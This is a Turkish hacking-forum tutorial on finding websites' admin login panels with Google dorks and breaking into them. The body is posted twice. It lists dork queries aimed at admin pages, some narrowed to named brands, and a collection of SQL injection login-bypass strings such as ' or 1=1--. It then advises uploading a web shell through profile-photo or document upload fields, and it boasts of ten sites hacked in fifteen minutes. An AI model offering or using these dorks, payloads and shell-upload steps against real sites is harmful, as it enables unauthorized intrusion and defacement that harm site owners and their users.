Merhaba arkadaşlar
Bypass ile dork yazma ve site hackleme hakkında anlatım yapıcağım
Bypass nedir ?
Bana göre bypass script kodlanmasındaki hatalardan yararlanarak admin login ve pass ' ı bug 'a sokarak giriş yapmamızı sağlayan küçük bir hata ve büyük bir zarar
Başlayalım hadi
ByPass için dork nasıl yazıcağız nasıl site bulabileceğiz ?
ByPass dorklarımızı kendimiz oluşturalım
Örnek çok kullanılan dorklar :
Bunlar çok kullanılan favori dorklar arasındadır
Ama hacklenen siteleri kaç kere hackleyebileceğizki hep aynı siteler
Öncelikle bir sitenin admin panelini buluyoruz
Admin panel bulma yöntemi için ;
ShuJaira yöneticimizin hazırlamış olduğu bu süper konuyuda inceleyebilirsiniz
ByPass için Login ve Pass lar ;
Evet bir sitenin admin logini bulduk diyelim
Örnek admin loginler ;
28:06:2016 :
Yeni bir dork oluşturmayıda ekleyim bari konuya
Arkadaşlar bu dorklardan fazla site çıkmayabilir bunun içinde diğer şekilde şöyle bir mantıkla kendi kafamızdaki kelimeler ile site çıkartabiliriz .. Örnek ;
intext Komutuna kelime ekleyerek daha değişik siteler çıkartabilirsiniz :=)
Örnek bir site ;
r@y - Pentester Nickli arkadaşımız video çekmiş bunun hakkında izleyin
Ellerine sağlık Pentester
[ame]https://www.youtube.com/watch?v=7Clv1EMaBBA[/ame]
Ve arkadaşlar girdik panele başarılı olduk lakin her siteye girmez dediğim gibi
Bazen kullanıcı paneli çıkar giriş yaparsınız edit yaparsınız ee neden sitede hiçbirşey değişmedi dersiniz , çünkü orası user giriş yeri admin yetkisi yoktur
Ee değişmedi diye hemen çıkacak değiliz dimi
Biraz uğraşıcağız , kullanıcı panelinde upload yeri varmı onu araştırıcağız.
Profil fotoğrafı yükleme yetkisi var ise shell yüklemeyi deniyeceğiz
TC-6.35mm ' nin süper konuları :trl
Shell yüklemek için örnek bir konu süper konu lakin
Sadece resim yüklemeden shell yüklemeyi denemeyiniz örneğin :
Pdf , csv , html , txt gibi uzantıları yükleme yeri var ise onlarıda bu şekil deneyebilirsiniz
Link ;
Konuya eklemeyi unutmuşum
Arkadaşlar sadece dorklarımızı yazdıktan sonra giriş yapamaz isek bu konuya değinebiliriz buda bypass bug'u ile çalışmaktadır
Arkadaşlar bu dork oluşturma sizlerin hayal gücünüze kalmış birşey tabiki her siteye girecek diye birşey yoktur ama eğer başarılı olmak istiyor iseniz sonuna kadar denemelisiniz
Başarı sır değildir.
Evet arkadaşlar anlatacağım bu kadar bence fazlaya gerek yok
Dediğim gibi siteye girmiyor diye bıkmayın bunun için googlede yandexte vs. dorkları aradağımızda önümüze çıkan siteleri tek tek deneyeceğiz
Azimli olun yeterli.
Edit:
Ayrıca bu yöntem ile arkadaş 15 dakikada 10 site hackledi
http://www.turkhackteam.org/govde-gosterisi/1333784-ll-10-marka-siteler-hacked-ll-elit-ll.html
Sormak istediğiniz birşey var ise konu altından cevaplayayım
Konu anlatımı tamamen bana aittir.
Saygılarımla arkadaşlar , sağlıcakla kalın.
乂❤‿❤乂☬❛GonzaLes.°*シ乂❤‿❤乂
Bypass ile dork yazma ve site hackleme hakkında anlatım yapıcağım
Bypass nedir ?
Bana göre bypass script kodlanmasındaki hatalardan yararlanarak admin login ve pass ' ı bug 'a sokarak giriş yapmamızı sağlayan küçük bir hata ve büyük bir zarar
Başlayalım hadi
ByPass için dork nasıl yazıcağız nasıl site bulabileceğiz ?
ByPass dorklarımızı kendimiz oluşturalım
Örnek çok kullanılan dorklar :
Kod:
[COLOR=White]inurl:/admin/login.php
inurl:/administrator/index.php
inurl:/admins/login.php
inurl/admin1/login.php[/COLOR]
Ama hacklenen siteleri kaç kere hackleyebileceğizki hep aynı siteler
Öncelikle bir sitenin admin panelini buluyoruz
Admin panel bulma yöntemi için ;
ShuJaira yöneticimizin hazırlamış olduğu bu süper konuyuda inceleyebilirsiniz
Kod:
[URL]http://www.turkhackteam.org/web-server-guvenligi/1287950-site-admin-panel-bulma-yontemleri-lorthia988.html[/URL]
ByPass için Login ve Pass lar ;
Kod:
[COLOR=White]
'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
admin'--
")) or (("x"))=(("x
" or ""+"
admin"or 1=1 or ""="
admin") or ("1"="1"--[/COLOR]
Örnek admin loginler ;
28:06:2016 :
Yeni bir dork oluşturmayıda ekleyim bari konuya
Arkadaşlar bu dorklardan fazla site çıkmayabilir bunun içinde diğer şekilde şöyle bir mantıkla kendi kafamızdaki kelimeler ile site çıkartabiliriz .. Örnek ;
Kod:
[COLOR=YellowGreen]inurl:admin/login.php[/COLOR] [COLOR=Lime]intext:[/COLOR][COLOR=Yellow]Skoda[/COLOR]
[COLOR=yellowgreen]inurl:admin/login.php[/COLOR] [COLOR=lime]intext:[/COLOR][COLOR=Yellow]Daikin[/COLOR]
Kod:
[COLOR=Olive]inurl:/manager/login.php
inurl:/panelv2/login.php
inurl:/panel/login.php
inurl:/eng/login.php[/COLOR]
r@y - Pentester Nickli arkadaşımız video çekmiş bunun hakkında izleyin
Ellerine sağlık Pentester
[ame]https://www.youtube.com/watch?v=7Clv1EMaBBA[/ame]
Ve arkadaşlar girdik panele başarılı olduk lakin her siteye girmez dediğim gibi
Bazen kullanıcı paneli çıkar giriş yaparsınız edit yaparsınız ee neden sitede hiçbirşey değişmedi dersiniz , çünkü orası user giriş yeri admin yetkisi yoktur
Ee değişmedi diye hemen çıkacak değiliz dimi
Biraz uğraşıcağız , kullanıcı panelinde upload yeri varmı onu araştırıcağız.
Profil fotoğrafı yükleme yetkisi var ise shell yüklemeyi deniyeceğiz
TC-6.35mm ' nin süper konuları :trl
Shell yüklemek için örnek bir konu süper konu lakin
Sadece resim yüklemeden shell yüklemeyi denemeyiniz örneğin :
Pdf , csv , html , txt gibi uzantıları yükleme yeri var ise onlarıda bu şekil deneyebilirsiniz
Link ;
Kod:
[URL]http://www.turkhackteam.org/hack-videolari/1283738-tamper-data-ile-website-hack-videolu-tc-6-35mm.html[/URL]
Arkadaşlar sadece dorklarımızı yazdıktan sonra giriş yapamaz isek bu konuya değinebiliriz buda bypass bug'u ile çalışmaktadır
Kod:
[URL]http://www.turkhackteam.org/hack-videolari/1285213-noredirect-panel-bypass-hack-videolu-tc-6-35mm.html[/URL]
Başarı sır değildir.
Evet arkadaşlar anlatacağım bu kadar bence fazlaya gerek yok
Dediğim gibi siteye girmiyor diye bıkmayın bunun için googlede yandexte vs. dorkları aradağımızda önümüze çıkan siteleri tek tek deneyeceğiz
Azimli olun yeterli.
Edit:
Ayrıca bu yöntem ile arkadaş 15 dakikada 10 site hackledi
http://www.turkhackteam.org/govde-gosterisi/1333784-ll-10-marka-siteler-hacked-ll-elit-ll.html
Sormak istediğiniz birşey var ise konu altından cevaplayayım
Konu anlatımı tamamen bana aittir.
Saygılarımla arkadaşlar , sağlıcakla kalın.
乂❤‿❤乂☬❛GonzaLes.°*シ乂❤‿❤乂
Moderatör tarafında düzenlendi: